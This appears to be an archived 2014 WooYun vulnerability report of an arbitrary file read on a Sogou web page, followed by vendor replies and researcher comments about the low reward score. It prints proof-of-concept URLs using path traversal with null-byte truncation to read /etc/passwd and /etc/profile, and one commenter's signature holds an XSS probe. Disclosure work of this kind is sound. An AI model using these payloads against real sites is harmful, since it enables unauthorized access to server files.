漏洞概要
关注数(24)
关注此漏洞
漏洞标题:搜狗某站点任意文件读取(2)
相关厂商:搜狗
提交时间:2014-06-12 23:52
修复时间:2014-07-27 23:54
公开时间:2014-07-27 23:54
漏洞类型:任意文件遍历/下载
危害等级:高
自评Rank:15
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2014-06-12: 细节已通知厂商并且等待厂商处理中
2014-06-17: 厂商已经确认,细节仅向厂商公开
2014-06-27: 细节向核心白帽子及相关领域专家公开
2014-07-07: 细节向普通白帽子公开
2014-07-17: 细节向实习白帽子公开
2014-07-27: 细节向公众公开
简要描述:
还是两天前的站点。你们做了修补,蘑菇总是长一片啊同样问题不会只有一个。修补千万不能指哪修哪,还得全面评估才是。前面2个漏洞都修补了,为什么不确认呢?好吧,再来一个给你们提醒提醒。
详细说明:
在案例:http://wooyun.org/bugs/wooyun-2010-064342
中,你们确实已经对path进行了限制。
如今访问会空白,如下图:
好了,看样子这个点暂时没有了。通过对目录的遍历以及一些页面的扫描,结合fuzz之后。得到了head.html也有调用的成分。
但是这次没有上次那么完整,需要配合%00截断如图:
http://ie.sogou.com/user/head.html?size=../../../../../../../../../etc/passwd%00.jpg
漏洞证明:
再读:
http://ie.sogou.com/user/head.html?size=../../../../../../../../../etc/profile%00.jpg
修复方案:
嗯。。应该知道怎么修了,这次千万不要在只修一个地方了。看看代码还有哪些地方有类似调用的,fix掉吧。
版权声明:转载请注明来源 梧桐雨@乌云
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:3
确认时间:2014-06-17 11:11
厂商回复:
欢迎到SGSRC提交漏洞,感谢支持!
最新状态:
暂无
漏洞评价:
评论
这些评论似乎很乌云~~~思密达
-
2014-06-17 11:43 |
梧桐雨 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)
无论如何我都想不明白了,一个任意文件读取能读你们服务器上的东西,怎么就只值3分,如果你们永远把白帽子当成乞讨者去看待,你们的安全永远不可能做得好!
-
2014-06-13 14:54 |
YouYaX(乌云厂商)
-
2014-06-13 15:17 |
平仔 ( 路人 | Rank:10 漏洞数:1 | 混迹在电商的网络营销人。)
@YouYaX 这位说到实处了!大厂商里面有初级程序猿的!
-
2014-06-15 13:37 |
梧桐雨 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)
如果再说这个是SGSRC有人提交了,也是我先提交的,再忽略简直就是胡扯!
-
2014-06-15 13:38 |
梧桐雨 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)
-
2014-06-17 11:34 |
zj1244 ( 普通白帽子 | Rank:273 漏洞数:33 | 小葵)
-
2014-06-17 11:39 |
梧桐雨 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)
-
2014-06-17 11:43 |
梧桐雨 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)
无论如何我都想不明白了,一个任意文件读取能读你们服务器上的东西,怎么就只值3分,如果你们永远把白帽子当成乞讨者去看待,你们的安全永远不可能做得好!
-
2014-06-17 11:50 |
gainover ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)
@梧桐雨 = = 我觉得吧,他们这是在告诉你:“让你在乌云提交,我给你3分!看你还在乌云提交不!”
-
2014-06-17 12:11 |
zj1244 ( 普通白帽子 | Rank:273 漏洞数:33 | 小葵)
-
2014-06-17 12:15 |
clown岩 ( 实习白帽子 | Rank:42 漏洞数:13 | 哎呀 谁的肥皂? 各位大牛多多关照!陪聊 ...)
@gainover 不叫事 任意文件读取在SGSRC也就给4分
-
2014-06-17 12:45 |
zcy ( 实习白帽子 | Rank:93 漏洞数:15 )
-
2014-06-17 13:39 |
niliu ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)
-
2014-06-17 16:52 |
寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | 一切语言转汇编理论)
@梧桐雨 他们的回复就是叫你去他们的SGSRC提交呗。
-
2014-07-07 11:25 |
luwikes ( 普通白帽子 | Rank:512 漏洞数:77 | 潜心学习~~~)
@niliu @寂寞的瘦子 @gainover @梧桐雨 建议乌云评估一个rank值给厂商参考,厂商给的rank值决定公开的时间。比如乌云评估10,厂商给2,那就不要10天、10天的等待着公开了,直接2天、2天来吧。按百分比决定公开时间,反正他们也不重视。 你们觉得呢?
-
2014-07-28 09:35 |
xyang ( 普通白帽子 | Rank:242 漏洞数:51 | stay hungry stay foolish)
-
2014-07-28 10:03 |
Mody ( 普通白帽子 | Rank:110 漏洞数:27 | "><img src=x onerror=alert(1);> <img s...)
-
2014-07-28 14:25 |
keke ( 路人 | Rank:6 漏洞数:8 | 目测和口算各种妹纸)
-
2014-07-28 15:12 |
dante ( 路人 | Rank:4 漏洞数:1 | http://zhu.zhu.kr)